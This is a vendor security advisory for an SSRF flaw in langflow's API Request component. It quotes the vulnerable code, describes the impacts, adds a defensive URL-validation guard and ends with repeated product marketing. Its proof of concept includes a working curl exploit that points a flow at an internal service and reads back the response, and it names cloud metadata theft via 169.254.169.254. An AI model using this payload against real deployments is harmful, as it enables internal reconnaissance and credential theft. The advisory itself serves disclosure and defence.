CVE-2025-68477 is a high-severity server-side request forgery (SSRF) vulnerability in langflow (pip), affecting versions < 1.7.1. It is fixed in 1.7.1.
Vulnerability Overview

Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.

Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible, accessing internal resources from the server's network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.

Vulnerable Code

When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.
https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L349-L359

```python
@router.post("/run/{flow_id_or_name}", response_model=None, response_model_exclude_none=True)
async def simplified_run_flow(
    *,
    background_tasks: BackgroundTasks,
    flow: Annotated[FlowRead | None, Depends(get_flow_by_id_or_endpoint_name)],
    input_request: SimplifiedAPIRequest | None = None,
    stream: bool = False,
    api_key_user: Annotated[UserRead, Depends(api_key_security)],
    context: dict | None = None,
    http_request: Request,
):
```

https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L573-L588

```python
@router.post(
    "/run/advanced/{flow_id_or_name}",
    response_model=RunResponse,
    response_model_exclude_none=True,
)
async def experimental_run_flow(
    *,
    session: DbSession,
    flow: Annotated[Flow, Depends(get_flow_by_id_or_endpoint_name)],
    inputs: list[InputValueRequest] | None = None,
    outputs: list[str] | None = None,
    tweaks: Annotated[Tweaks | None, Body(embed=True)] = None,
    stream: Annotated[bool, Body(embed=True)] = False,
    session_id: Annotated[None | str, Body(embed=True)] = None,
    api_key_user: Annotated[UserRead, Depends(api_key_security)],
) -> RunResponse:
```

Normalization/validation stage: it only checks that the URL is non-empty and well-formed. There is no blocking of private networks, localhost, or IMDS.
https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L280-L289

```python
def normalize_url(self, url: str) -> str:
    """Normalize URL by adding https:// if no protocol is specified."""
    if not url or not isinstance(url, str):
        msg = "URL cannot be empty"
        raise ValueError(msg)
    url = url.strip()
    if url.startswith(("http://", "https://")):
        return url
    return f"https://{url}"
```

https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L433-L438

```python
url = self.normalize_url(url)

# Validate URL
if not validators.url(url):
    msg = f"Invalid URL provided: {url}"
    raise ValueError(msg)
```

On the server side, it sends a request to an arbitrary URL using httpx.AsyncClient and exposes the response body as metadata["result"].

https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L312-L322

```python
try:
    # Prepare request parameters
    request_params = {
        "method": method,
        "url": url,
        "headers": headers,
        "json": processed_body,
        "timeout": timeout,
        "follow_redirects": follow_redirects,
    }
    response = await client.request(**request_params)
```

https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L335-L340

```python
# Base metadata
metadata = {
    "source": url,
    "status_code": response.status_code,
    "response_headers": response_headers,
}
```

https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/apirequest.py#L364-L379

```python
# Handle response content
if is_binary:
    result = response.content
else:
    try:
        result = response.json()
    except json.JSONDecodeError:
        self.log("Failed to decode JSON response")
        result = response.text.encode("utf-8")

metadata["result"] = result

if include_httpx_metadata:
    metadata.update({"headers": headers})

return Data(data=metadata)
```

PoC
Description

I launched a Langflow server using the latest langflowai/langflow:latest Docker container, and a separate container internal-api that exposes an internal-only endpoint /internal on port 8000. Both containers were attached to the same user-defined network (ssrf-net), allowing communication by name or via the IP 172.18.0.3. I added an API Request node to a Langflow flow and set the URL to the internal service (http://172.18.0.3:8000/internal). Then I invoked /api/v1/run/advanced/<FLOWID> with an API key to perform SSRF. The response returned the internal service's body in the result field, confirming non-blind SSRF.

Langflow Setting (screenshot)

Exploit

```bash
curl -s -X POST 'http://localhost:7860/api/v1/run/advanced/0b7f7713-d88c-4f92-bcf8-0dafe250ea9d' \
  -H 'Content-Type: application/json' \
  -H 'x-api-key: sk-HHc93OjH4epEhfWrweP1IwpooJ3ZZnYOu-HgqJV4M' \
  --data-raw '{
    "inputs":[{"components":[],"input_value":""}],
    "outputs":["Chat Output"],
    "tweaks":{"API Request":{"url_input":"http://172.18.0.3:8000/internal","include_httpx_metadata":false}},
    "stream":false
  }' | jq -r '.outputs[0].outputs[0].results.message.text | sub("^json\\n";"") | sub("\\n$";"") | fromjson | .result'
```

(screenshot of the response)

Impact

- Scanning internal assets and data exfiltration: Attackers can access internal administrative HTTP endpoints, proxies, metrics dashboards, and management consoles to obtain sensitive information (versions, tokens, configurations).
- Access to metadata services: In cloud environments, attackers can use 169.254.169.254, etc., to steal instance metadata and credentials.
- Foothold for attacking internal services: Can forge requests by abusing inter-service trust and become the starting point of an SSRF→RCE chain (e.g., invoking an internal admin API).
- Non-blind: Because the response body is returned to the client, attackers can immediately view and exploit the collected data.
- Risk in multi-tenant environments: Bypassing tenant boundaries can cause cross-leakage of internal network information, resulting in high impact. Even in single-tenant setups, the risk remains high depending on internal network policies.
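As an added example (not part of the advisory or of langflow's own code), the following is a resolve-then-check guard that a defender could place in front of the `client.request(...)` call quoted above. It keeps the same normalize step, then rejects any target whose host resolves to a loopback, RFC 1918, link-local (including 169.254.169.254), multicast, reserved or unspecified address, and goes beyond the ranges the advisory lists by also covering IPv6 and IPv4-mapped IPv6 literals. The `resolver` parameter is an assumption added so the check can be exercised without network access; everything else is standard library.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def normalize_url(url: str) -> str:
    """Same normalization the component performs: prepend https:// when no scheme is given."""
    if not url or not isinstance(url, str):
        raise ValueError("URL cannot be empty")
    url = url.strip()
    return url if url.startswith(("http://", "https://")) else f"https://{url}"

def is_disallowed_address(addr) -> bool:
    """Loopback, RFC 1918, link-local (covers 169.254.169.254), multicast, reserved, unspecified."""
    mapped = getattr(addr, "ipv4_mapped", None)  # IPv6-only attribute: judge ::ffff:127.0.0.1 as 127.0.0.1
    addr = mapped if mapped is not None else addr
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)

def resolve_with_dns(host: str) -> list[str]:
    """An IP literal is returned as-is; a hostname goes through getaddrinfo (empty list on failure)."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
        except socket.gaierror:
            return []

def validate_outbound_url(url: str, resolver=resolve_with_dns) -> str:
    """Return the normalized URL if every address its host resolves to is publicly routable, else raise.
    Remaining gaps: re-check each redirect hop (or pass follow_redirects=False), and DNS rebinding."""
    url = normalize_url(url)
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        raise ValueError(f"Invalid URL provided: {url}")
    addresses = resolver(parsed.hostname)  # resolver is an injectable assumption for offline testing
    if not addresses:
        raise ValueError(f"Host does not resolve: {parsed.hostname}")
    for text in addresses:
        if is_disallowed_address(ipaddress.ip_address(text)):
            raise ValueError(f"Refusing non-public target {parsed.hostname} -> {text}")
    return url

def is_allowed_url(url: str, resolver=resolve_with_dns) -> bool:
    # Boolean guard to run before client.request(); False means the request must not be sent.
    try:
        validate_outbound_url(url, resolver)
        return True
    except ValueError:
        return False
```

Checking every resolved address matters because a name with one public and one internal record would otherwise pass; a guard like this does not remove the need to also pin the httpx client to the validated address or disable redirects.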
Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.
CVE-2025-68477 has a CVSS score of 7.7 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment.
A fixed version is available (1.7.1). Upgrading removes the vulnerable code path.
Ecosystem: pip
Affected: langflow (< 1.7.1)
Fix: langflow → 1.7.1 (pip)

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter instead of chasing every advisory.
Kodem's runtime-powered SCA identifies whether CVE-2025-68477 is reachable in your applications.
Upgrade langflow to 1.7.1 or later to resolve this vulnerability.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
CVE-2025-68477 is a high-severity server-side request forgery (SSRF) vulnerability in langflow (pip), affecting versions < 1.7.1. It is fixed in 1.7.1. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
CVE-2025-68477 has a CVSS score of 7.7 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
langflow (pip) versions < 1.7.1 are affected.
Yes. CVE-2025-68477 is fixed in 1.7.1. Upgrade to this version or later.
Whether CVE-2025-68477 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
Upgrade langflow to 1.7.1 or later.